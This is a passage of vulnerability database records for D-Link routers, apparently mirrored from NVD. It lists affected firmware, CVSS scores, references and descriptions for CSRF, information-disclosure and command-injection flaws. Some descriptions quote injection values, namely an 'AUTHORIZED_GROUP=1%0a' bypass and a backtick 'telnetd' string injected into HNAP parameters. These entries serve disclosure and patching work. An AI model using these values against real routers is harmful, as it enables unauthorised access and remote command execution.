"matchCriteriaId": "AE7C571B-BCCB-4853-A08E-2EF9A64C94CD",
"versionEndIncluding": "1.08b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC772491-6371-4712-B358-E74D9C5062FD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-890l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50FCDBDC-32F8-42DF-BD3C-A9EFC11D036C",
"versionEndIncluding": "1.11b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B1EA89C7-4655-43A3-9D2B-D57640D56C09",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-890r_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA0BEAAD-6330-47FE-A8F6-665C3F346619",
"versionEndIncluding": "1.11b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D678E889-3D74-4D16-84D0-41F547519A7F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "48D9C475-FB79-4D18-823C-0A3F01CB478E",
"versionEndIncluding": "1.12b05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD481B64-A25D-4123-B575-20EC3C524D9C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885r_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0261FBA8-D370-4581-B4AE-E8DBF4546C50",
"versionEndIncluding": "1.12b05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8E0351A1-D161-468E-A2C4-1FB92E978DA7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CBB7A220-2C3E-45B4-BA2E-D6C595B391D7",
"versionEndIncluding": "1.12b10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0B9EBC5D-43DE-4B26-8272-5A9AD2ECE2E2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895r_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4B2469-DDAB-4FD1-A446-B304AAF78BB3",
"versionEndIncluding": "1.12b10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DF2DADDD-2F1C-458D-B3F5-07EE0FE35E92",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-818lx_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "072F053E-4DAB-4246-BEE7-F4813957BF56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-818lx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1B6E718C-2E2A-4E9B-A83D-25C01F681301",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php."
},
{
"lang": "es",
"value": "Los routers D-Link DIR-859 versiones anteriores a la versi\u00f3n v1.07b03_beta, permiten una divulgaci\u00f3n de informaci\u00f3n no autenticada por medio del valor AUTHORIZED_GROUP=1%0a, como es demostrado por el archivo vpnconfig.php."
}
],
"id": "CVE-2019-20213",
"lastModified": "2024-11-21T04:38:13.213",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-02T14:16:36.533",
"references": [
{
"source": "cve@mitre.org",
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"source": "cve@mitre.org",
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-74"
},
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-05-10 02:29
Modified
2024-11-21 03:42
Severity ?
Summary
CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html | Exploit, Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | 1.12 | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:1.12:*:*:*:*:*:*:*",
"matchCriteriaId": "E12017CD-9CA6-436F-8749-42A0C0422F05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components."
},
{
"lang": "es",
"value": "Existe Cross-Site Request Forgery (CSRF) en dispositivos D-Link DIR-868L que conduce a, por ejemplo, un cambio en la contrase\u00f1a de administrador. hedwig.cgi y pigwidgeon.cgi son dos de los componentes afectados."
}
],
"id": "CVE-2018-10957",
"lastModified": "2024-11-21T03:42:23.703",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-05-10T02:29:00.450",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-05-13 14:29
Modified
2024-11-21 03:58
Severity ?
Summary
In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. It needs to bypass the wget command option with a single quote. A vulnerable /HNAP1/SetClientInfoDemo XML message could have single quotes and backquotes in the AudioMute or AudioEnable element, such as the '`telnetd`' string.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990 | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| d-link | dir-868l_firmware | 2.05b02 | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-868l_firmware:2.05b02:*:*:*:*:*:*:*",
"matchCriteriaId": "21680BA3-2C38-4E14-97F4-480F5B6EC3FB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. It needs to bypass the wget command option with a single quote. A vulnerable /HNAP1/SetClientInfoDemo XML message could have single quotes and backquotes in the AudioMute or AudioEnable element, such as the \u0027`telnetd`\u0027 string."
},
{
"lang": "es",
"value": "En el mensaje HNAP1/SetClientInfoDemo, los par\u00e1metros AudioMute y AudioEnable son vulnerables y las vulnerabilidades afectan a los dispositivos D-Link DIR-868L Rev.B 2.05B02. En el c\u00f3digo fuente del archivo SetClientInfoDemo.php, los par\u00e1metros AudioMute y AudioEnble se guardan en el archivo de script shellPath sin ninguna comprobaci\u00f3n regex. Despue\u00e9s que se ejecuta el archivo de script, se produce la inyecci\u00f3n de comandos. Debe omitir la opci\u00f3n del comando wget con una sola cita. Un mensaje XML vulnerable /HNAP1/SetClientInfoDemo podr\u00eda tener comillas simples e invertidas en el elemento AudioMute o AudioEnable, como la cadena \u0027`telnetd`\u0027."
}
],
"id": "CVE-2018-19988",
"lastModified": "2024-11-21T03:58:56.967",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-05-13T14:29:01.270",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-12-30 17:15
Modified
2025-02-04 21:15
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-859_firmware | * | |
| dlink | dir-859_firmware | 1.06b01 | |
| dlink | dir-859 | - | |
| dlink | dir-822_firmware | * | |
| dlink | dir-822 | - | |
| dlink | dir-822_firmware | * | |
| dlink | dir-822 | - | |
| dlink | dir-823_firmware | * | |
| dlink | dir-823_firmware | 1.00b06 | |
| dlink | dir-823 | - | |
| dlink | dir-865l_firmware | * | |
| dlink | dir-865l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - | |
| dlink | dir-869_firmware | * | |
| dlink | dir-869_firmware | 1.03b02 | |
| dlink | dir-869 | - | |
| dlink | dir-880l_firmware | * | |
| dlink | dir-880l | - | |
| dlink | dir-890l_firmware | * | |
| dlink | dir-890l_firmware | 1.11b01 | |
| dlink | dir-890l | - | |
| dlink | dir-890r_firmware | * | |
| dlink | dir-890r_firmware | 1.11b01 | |
| dlink | dir-890r | - | |
| dlink | dir-885l_firmware | * | |
| dlink | dir-885l | - | |
| dlink | dir-885r_firmware | * | |
| dlink | dir-885r | - | |
| dlink | dir-895l_firmware | * | |
| dlink | dir-895l | - | |
| dlink | dir-895r_firmware | * | |
| dlink | dir-895r | - | |
| dlink | dir-818lx_firmware | - | |
| dlink | dir-818lx | - |
{
"cisaActionDue": "2023-07-20",
"cisaExploitAdd": "2023-06-29",
"cisaRequiredAction": "Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.",
"cisaVulnerabilityName": "D-Link DIR-859 Router Command Execution Vulnerability",
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-859_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C2ABCF49-625F-4267-8B6D-14081B31E8B0",
"versionEndIncluding": "1.05b03",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-859_firmware:1.06b01:beta1:*:*:*:*:*:*",
"matchCriteriaId": "BB555A1A-6B26-483E-ABFC-B64B928E7CC5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-859:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D1DEEF5B-D8E9-45F3-8A89-52CE8402E6F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F8E6CDA-679A-4A31-8D8D-BD283C5E1E3E",
"versionEndIncluding": "2.03b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3894F0E-37F8-4A89-87AC-1DB524D4AE04",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46B25758-8EC2-4598-A834-9D513B030629",
"versionEndIncluding": "3.12b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3894F0E-37F8-4A89-87AC-1DB524D4AE04",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-823_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99D9046B-206E-4267-98BA-BF572682F134",
"versionEndIncluding": "1.00b06",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-823_firmware:1.00b06:beta:*:*:*:*:*:*",
"matchCriteriaId": "5A56D2BD-5160-46FE-8AC7-CB4CA50E4D5D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-823:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EC426833-BEA7-4029-BBBB-94688EE801BC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-865l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4406996E-761D-4EDC-9877-17B7472C1422",
"versionEndIncluding": "1.07b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-865l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A853DF-6DF1-4E8E-8D55-95279EE0CB30",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F9D90548-24FD-416F-9159-6F7AB318C923",
"versionEndIncluding": "1.12b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B0CA3A5-CF3D-4D1B-BB07-EE0D91901BC9",
"versionEndIncluding": "2.05b02",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-869_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "499E8ADA-B4ED-42B2-B237-716A77BD546A",
"versionEndIncluding": "1.03b02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-869_firmware:1.03b02:beta02:*:*:*:*:*:*",
"matchCriteriaId": "AF693676-C580-44CF-AAC6-6E38658FEAFB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-869:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E9EB6E8E-03FA-4477-B97A-0752B7C443F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE7C571B-BCCB-4853-A08E-2EF9A64C94CD",
"versionEndIncluding": "1.08b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC772491-6371-4712-B358-E74D9C5062FD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-890l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50FCDBDC-32F8-42DF-BD3C-A9EFC11D036C",
"versionEndIncluding": "1.11b01",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-890l_firmware:1.11b01:beta01:*:*:*:*:*:*",
"matchCriteriaId": "7A4A1A68-5B14-47B7-9D02-274A0E4AF2F2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B1EA89C7-4655-43A3-9D2B-D57640D56C09",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-890r_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA0BEAAD-6330-47FE-A8F6-665C3F346619",
"versionEndIncluding": "1.11b01",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-890r_firmware:1.11b01:beta01:*:*:*:*:*:*",
"matchCriteriaId": "4C18C9D9-9418-441B-9367-91F86137245C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D678E889-3D74-4D16-84D0-41F547519A7F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "48D9C475-FB79-4D18-823C-0A3F01CB478E",
"versionEndIncluding": "1.12b05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD481B64-A25D-4123-B575-20EC3C524D9C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885r_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0261FBA8-D370-4581-B4AE-E8DBF4546C50",
"versionEndIncluding": "1.12b05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8E0351A1-D161-468E-A2C4-1FB92E978DA7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CBB7A220-2C3E-45B4-BA2E-D6C595B391D7",
"versionEndIncluding": "1.12b10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0B9EBC5D-43DE-4B26-8272-5A9AD2ECE2E2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895r_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4B2469-DDAB-4FD1-A446-B304AAF78BB3",
"versionEndIncluding": "1.12b10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DF2DADDD-2F1C-458D-B3F5-07EE0FE35E92",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-818lx_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "072F053E-4DAB-4246-BEE7-F4813957BF56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-818lx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1B6E718C-2E2A-4E9B-A83D-25C01F681301",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
